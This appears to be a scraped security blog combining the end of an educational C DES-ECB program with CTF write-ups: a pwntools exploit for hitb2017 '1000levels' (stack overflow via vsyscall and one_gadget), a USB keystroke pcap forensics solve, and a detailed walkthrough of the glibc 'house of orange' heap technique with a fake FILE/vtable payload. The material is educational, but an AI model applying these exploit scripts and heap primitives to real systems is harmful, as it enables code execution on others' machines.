/* http://www.ee.ic.ac.uk/pcheung/teaching/ee4_network_security/L02DESIDESAES.pdf */
/* Left / right reversal. */
des_concatenate_final_ciphertext(sub_ciphertext[DES_ENCRYPTION_ROUND].l,
sub_ciphertext[DES_ENCRYPTION_ROUND].r , concatenate_ciphertext);

des_permutation(output, concatenate_ciphertext, des_table_ip_reverse,
sizeof(des_table_ip_reverse));
}

char *des_read_input(char *input) {
int len = strlen(input);
char *str;

if (len % 8 != 0) {
printf("Key length or text length is not padded.\n"
"Future version might support padding plaintext as well as "
"modes of encryption like CBC.\n");
exit(-1);
}

str = malloc(len + 1);
if (!str) {
exit(-1);
return NULL;
}
memcpy(str, input, len);
str[len] = '\x00';

return str;
}

int main(int argc, char **argv) {
int c;
int mode;
char *str = NULL, *key = NULL;

while ((c = getopt(argc, argv, optstring)) != -1) {
switch (c) {
case 'e':
str = des_read_input(optarg);
mode = DES_ECB_ENCRYPT;
break;

case 'k':
/*
TODO:
Key verifiy: parity, weak key.
https://en.wikipedia.org/wiki/Weak_key#Weak_keys_in_DES.
*/
key = des_read_input(optarg);
break;

case 'd':
str = des_read_input(optarg);
mode = DES_ECB_DECRYPT;
break;

default:
printf("-e encode_string / -d decode_string\n");
exit(-1);
}
}

if (mode == DES_ECB_ENCRYPT) {
char ciphertext[9] = {0};
printf("read %s\n", str);
des_main_routine(str, key, ciphertext, DES_ECB_ENCRYPT);
printf("%s\n", ciphertext);
free(str);
} else if (mode == DES_ECB_DECRYPT) {
char plaintext[9] = {0};
des_main_routine(str, key, plaintext, DES_ECB_DECRYPT);
printf("%s\n", plaintext);
free(str);
}

return 0;
}

hitb2017 - 1000levels [Study]

1000levels
libc

Study: vsyscall in pwn.

Reference: http://0x48.pw/2017/08/29/0x49/

Protection

NX, PIE, Lazy binding

Vuln

Stack overflow in level function:

When hint function is executed before go function, the stack scenario in go function should be:

1
2
3
4
5
6
7
8
9
10
11
|       main ret    |
| rbp |
| | ---
| | |
| ... | | -> 0x110h
| | |
| | ---
| system/v6 | <- system is pushed in hint function
| timer timer |
| num_levels |
| ... |

If v2 is negative, we can overwrite system to one_gadget.

1
2
3
4
5
6
7
if ( v2 > 0 )                                 // neg
system_stack_offset = v2;
else
puts("Coward");
puts("Any more?");
v3 = read_num();
v6 = system_stack_offset + v3; // overwrite system to one_gadget

Then, we need to answer questions for 1000 times: (of course you don’t really have to)

1
2
3
4
5
6
7
8
9
10
11
12
if ( v6 > 0 )
{
if ( v6 <= 999 )
{
v7 = v6;
}
else
{
puts("More levels than before!");
v7 = 1000LL;
}
...

In #999, the stack should be:

1
2
3
4
5
6
7
8
|   one_gadget  | <- How to rop since PIE is enable?
| timer |
| num_levels |
| ret_go |
| rbp |
| |--|
| ... | |--> 0x30h
| |--| <- User input

Here is the point: fixed address 0xffffffffff600000 as vsyscall, can be reviewed as simple “ret”.
vsyscall details: https://0xax.gitbooks.io/linux-insides/content/SysCall/syscall-3.html

Sample payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
DEBUG = 1
if DEBUG:
p = process('./1000levels', env={'LD_PRELOAD':'./libc.so.6'})
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug"
# gdb.attach(p)
else:
p = remote('47.74.147.103', 20001)
libc_base = -0x45390
one_gadget_base = 0x4526a
def ansewer():
p.recvuntil('Question: ')
tmp1 = eval(p.recvuntil(' ')[:-1])
p.recvuntil('* ')
tmp2 = eval(p.recvuntil(' ')[:-1])
p.sendline(str(tmp1 * tmp2))
def ansewer2():
p.recvuntil("Answer:")
p.sendline("233")
p.recvuntil('Choice:')
p.sendline('2')
p.recvuntil('Choice:')
p.sendline('1')
p.recvuntil('How many levels?')
p.sendline('-1')
p.recvuntil('Any more?')
# p.sendline("2")
p.sendline(str(libc_base+one_gadget_base))
for i in range(999):
log.info(i)
ansewer()
p.recvuntil('Question: ')
# gdb.attach(p)
p.send('a'*0x38 + p64(0xffffffffff600000) * 3)
p.interactive()

HackIT2017 - USBDucker

task.pcap

Solved with welly.

Tool UsbKeyboardDataHacker(https://github.com/WangYihang/UsbKeyboardDataHacker) produces a mystery string:

1
wkfb3'[lwbag[eci.[[fknju3u=y6,'pb7d0jptia[k=rm]=0dlcjus20n';9h4]y4'k;pfe1kss2cq.,s0cz3e-i

Later we figure out UsbKeyboardDataHacker has a bug: it neglects UP and DOWN key stroke.
Revise UsbKeyboardDataHacker tool and we get:

1
w<DOWN>k<DOWN>f<DOWN>b<DOWN>3'<UP>[<UP>l<UP><UP>w<DOWN>b<DOWN>ag<DOWN>[e<DOWN>ci.[<UP>[f<UP>k<UP>n<UP>ju<DOWN><DOWN>3<DOWN>u<DOWN>=<UP><UP>y<UP>6<UP>,'<DOWN>p<DOWN>b<DOWN>7<DOWN><UP>d<UP>0<UP>j<UP>pt<DOWN>i<DOWN>a<DOWN>[<DOWN>k<UP>=<UP>r<UP>m<UP>]=<DOWN>0<DOWN>d<DOWN><DOWN>lc<UP><UP><UP><UP>j<DOWN>u<DOWN>s<DOWN><DOWN>2<UP>0<UP>n<UP>'<UP>;9<DOWN>h<DOWN>4<DOWN>]<DOWN>y4<UP>'<UP>k<UP>;<UP>p<DOWN>f<DOWN>e<DOWN><DOWN><UP>1<UP><UP>k<UP>s<DOWN>s<DOWN>2<DOWN>c<DOWN>q<UP><UP>.<UP><UP>,<DOWN>s<DOWN>0<DOWN>c<DOWN>z3<UP>e<UP><UP>-<UP>i

Actually it looks like this:

1
2
3
4
5
w{w$ju},'pt]=j%;9+ps&#,i
k#>bn$:6pjim0{u'h;fks!s-
flag{k3yb0ard_sn4ke_2.0}
b[[e[fu~7d[=>*(0]'$1c$ce
3'ci.[%=%&k(lc*2y4!}%qz3

Here is the flag: flag{k3yb0ard_sn4ke_2.0}.

Understanding the house of orange [study]

houseoforange

0. Overview

Assumption: Heap overflow, information leak, libc <= 2.23.

  • 2.24 is still doable but we need to bypass more security checks…

The core idea of house of orange is the unsorted bin attack & fsp attack. To get a unsorted bin, house of orange overwrites the size of top chunk and trigger _int_free inside the sysmalloc function.

However the house of orange is arcane. Many blogs / articles contradicts each other because the whole exploitation process is fiendishly complicated. That’s why I am writing this blog and doing my own little research.

1. Obtain unsorted bin

1.1 part of _int_malloc internal

Back to _int_malloc, _int_malloc checks bins for allocating heap memory (roughly) in the following order:

1
2
3
4
5
6
fast_bin
small_bin
unsorted bin
large bin
top
sysmalloc

glibc calls sysmalloc if top chunk fails to allocate heap memory for the allocation request:

1
2
3
4
5
6
7
8
9
...
/* Otherwise, relay to handle system-dependent cases */
else
{
void *p = sysmalloc (nb, av);
if (p != NULL)
alloc_perturb (p, bytes);
return p;
}

In sysmalloc, glibc calls _int_free to free the old top chunk. Thus, we can obtain the unsorted bin.

Since we can overflow the heap, sysmalloc can be invoked if the size of the top chunk is small enough.

1.2 Bypass the security check

However, there is an assert right before the _int_free:

1
2
3
4
5
6
7
8
9
10
11
12
/*
If not the first time through, we require old_size to be
at least MINSIZE and to have prev_inuse set.
*/

assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));

/* Precondition: not enough current space to satisfy nb request */
assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));

To bypass the assert, we need to focus on this:

1
(unsigned long) old_end & (pagesize - 1)) == 0

The end of the top chunk should be aligned with the page size.
Therefore the fake top chunk size should be 0xf31.

1.3 Allocate new block

The request size should be reasonable. Otherwise syscall calls mmap instead.

1
2
3
4
5
6
7
8
9
10
/*
If have mmap, and the request size meets the mmap threshold, and
the system supports mmap, and there are few enough currently
allocated mmapped regions, try to directly map this request
rather than expanding top.
*/

if (av == NULL
|| ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
&& (mp_.n_mmaps < mp_.n_mmaps_max)))

get threshold in the runtime:

Now since sysmalloc does not use mmap and already passes the security check, it will free the top chunk:

1
2
...
_int_free (av, old_top, 1);

So the next time we allocate a chunk (e.g. 0x400), we should leak the libc by bk in the unsorted bin. So here is the heap memory:

Oh wait… Why we also have fd_nextsize and bk_nextsize?

1
2
3
4
5
6
7
8
9
10
11
12
13
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) {
...
if (in_smallbin_range (size)) {
...
} else {
if (fwd != bck) {
...
} else {
victim->fd_nextsize = victim->bk_nextsize = victim; // <- Here we are
}
...
}
}

Looks like glibc fills fd_nextsize and bk_nextsize to the allocated bin. Cool!

1.4 Leak

After the size of the top chunk is tampered, leak the information by following two steps:

  1. Request for a chunk with size of 0x400. Since bk in unsorted bin points to somewhere in the arena (bin), we can leak the libc. The remainder of the unsorted bin is stored in the large bin.
  2. Use the same chunk to leak fd_nextsize or bk_nextsize.

2. Malloc abort routine

2.1 Abort routine

1
2
3
4
malloc_printerr
__libc_message
abort
_IO_flush_all_lockp

Trace the abort:

_IO_flush_all_lockp reminds us about the FILE structure (Brief introduction: https://1ce0ear.github.io/2017/09/25/File-Stream-Pointer-Overflow1/).

_IO_flush_all_lockp calls _IO_OVERFLOW (fp, EOF).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int
_IO_flush_all_lockp (int do_lock)
{
int result = 0;
struct _IO_FILE *fp;
int last_stamp;

...
last_stamp = _IO_list_all_stamp;
fp = (_IO_FILE *) _IO_list_all;
while (fp != NULL)
{
run_fp = fp;
if (do_lock)
_IO_flockfile (fp);

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
#endif
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
result = EOF;
...

2.2 Unsorted bin attack

1
2
fp = (_IO_FILE *) _IO_list_all -> _IO_list_all = '/bin/sh'
IO_OVERFLOW (fp, EOF) -> system(fp)

Since we know the nice “feature” from unsorted bin (Brief introduction: https://1ce0ear.github.io/2017/10/16/Zerostorage/)

1
2
3
4
bck = victim->bk;
...
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

we can forge the bck to _IO_list_all - 0x10. Therefore _IO_list_all = unsorted_chunks (av).

The definition of _IO_list_all:

1
2
3
4
5
struct _IO_FILE_plus
{
_IO_FILE file;
const struct _IO_jump_t *vtable;
};

Since we can’t control the main arena, how to construct the fake vtable?

2.3 fp chain

Revisit code in _IO_flush_all_lockp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
int
_IO_flush_all_lockp (int do_lock)
{
int result = 0;
struct _IO_FILE *fp;
int last_stamp;

last_stamp = _IO_list_all_stamp;
fp = (_IO_FILE *) _IO_list_all;
while (fp != NULL) {
run_fp = fp;
if (do_lock)
_ IO_flockfile (fp);

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
|| (_IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)))
&& _IO_OVERFLOW (fp, EOF) == EOF)
result = EOF;

if (do_lock)
_IO_funlockfile (fp);
run_fp = NULL;

if (last_stamp != _IO_list_all_stamp) {
/* Something was added to the list. Start all over again. */
fp = (_IO_FILE *) _IO_list_all;
last_stamp = _IO_list_all_stamp;
} else {
fp = fp->_chain;
}
}
...
}

If _IO_FILE struct is not legal, _IO_OVERFLOW won’t be called. Then _IO_flush_all_lockp attempts to iterate fp by

1
fp = fp->_chain;

If we can overwrite _chain, we can control the fp. But where is unsorted bin(top) + 0x68?

2.4 top + 0x68

Look at malloc_state, we know bins are defined here:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
struct malloc_state
{
/* Serialize access. */
mutex_t mutex;

/* Flags (formerly in max_fast). */
int flags;

/* Fastbins */
mfastbinptr fastbinsY[NFASTBINS];

/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;

/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;

/* Normal bins packed as described above */
mchunkptr bins[NBINS * 2 - 2];
...

We also know unsorted_chunks and malloc_chunk:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#define bin_at(m, i) \
(mbinptr) (((char *) &((m)->bins[((i) - 1) * 2])) \
- offsetof (struct malloc_chunk, fd))

#define unsorted_chunks(M) (bin_at (M, 1))

struct malloc_chunk {

INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */

struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;

/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};

And we know small_bin and unsorted bin are continuous:

1
2
3
4
5
6
7
8
9
#define smallbin_index(sz) \
((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+ SMALLBIN_CORRECTION)

...
if (in_smallbin_range (nb))
{
idx = smallbin_index (nb);
bin = bin_at (av, idx);

Therefore top+0x68 points to small_bin[4]->bk.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
unsorted_chunks bin_at(M, 1) <- bins[0]
unsorted_chunks->fd = bins[0] <- top + 10
unsorted_chunks->bk = bins[1]

small_bin[0] bin_at(M, 2) <- bins[2] (Size 32)
small_bin[0]->fd = bins[2]
small_bin[0]->bk = bins[3]

small_bin[1] bin_at(M, 3) <- bins[4] (Size 48)
small_bin[1]->fd = bins[4]
small_bin[1]->bk = bins[5]

small_bin[2] bin_at(M, 4) <- bins[6] (Size 64)
...

small_bin[3] bin_at(M, 5) <- bins[8] (Size 80)
...

small_bin[4] bin_at(M, 6) <- bins[10] (Size 96)
small_bin[4]->fd = bins[10]
small_bin[4]->bk = bins[11] <- top + 0x68

Also it reminds me 0x60 can be treated as smallbin, not fastbin!

2.5 Make a smallbin

How can we get smallbin with size 0x60? The answer is the size of the unsorted bin should be tampered to 0x60.

Why 0x60? Revisit the unsorted bin logic:

Branch 1

1
2
3
4
5
6
7
8
...

if (in_smallbin_range (nb) &&
bck == unsorted_chunks (av) &&
victim == av->last_remainder &&
(unsigned long) (size) > (unsigned long) (nb + MINSIZE)) {
...
}

But branch 1 does not work here because:

Branch 2:

1
2
3
4
5
6
7
8
9
10
11
if (in_smallbin_range (size)) {
victim_index = smallbin_index (size); // => 6
bck = bin_at (av, victim_index); // bins[10]
fwd = bck->fd; // when smallbin is empty, fwd & bck points to itself.
}

mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;

Therefore unsorted bin with size 0x60 is settled to smallbin[4].

2.6 Abort happened

Abort happenes in the second iteration in the unsorted bin logic (since vicitm is malicious).

1
2
3
4
5
6
7
8
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (victim->size > av->system_mem, 0))
malloc_printerr (check_action, "malloc(): memory corruption",
chunk2mem (victim), av);
...

2.7 Fake _IO_list_all

Before the abort, _IO_list_all is overwritten by unsorted bin attack.s

Bad _IO_list_all:

We only have one last check for FILE:

1
2
3
4
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))

You can choice either way to bypass the check. The easiest should be:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
fake_chunk = '/bin/sh\x00'+p64(0x61)
fake_chunk += p64(0xdeadbeef)+p64(_IO_list_all-0x10)
fake_chunk += p64(0) + p64(1) # _IO_write_ptr _IO_write_base
fake_chunk = fake_chunk.ljust(0xc0,'\x00')
fake_chunk += p64(0) # mode

pay += fake_chunk
pay += p64(0)
pay += p64(0)

pay += p64(heap_base+0x5e8) # vtable
pay += p64(1)
pay += p64(2)
pay += p64(3)
pay += p64(0)*3 # vtable
pay += p64(system) # <- overwrite _IO_OVERFLOW

As a result, we can reach to our FILE structure in the heap by _chain:

Shell in the local:

Reference:
http://4ngelboy.blogspot.com/2016/10/hitcon-ctf-qual-2016-house-of-orange.html
https://github.com/scwuaptx/CTF/blob/master/2016-writeup/hitcon/houseoforange.py

Special Thanks:
veritas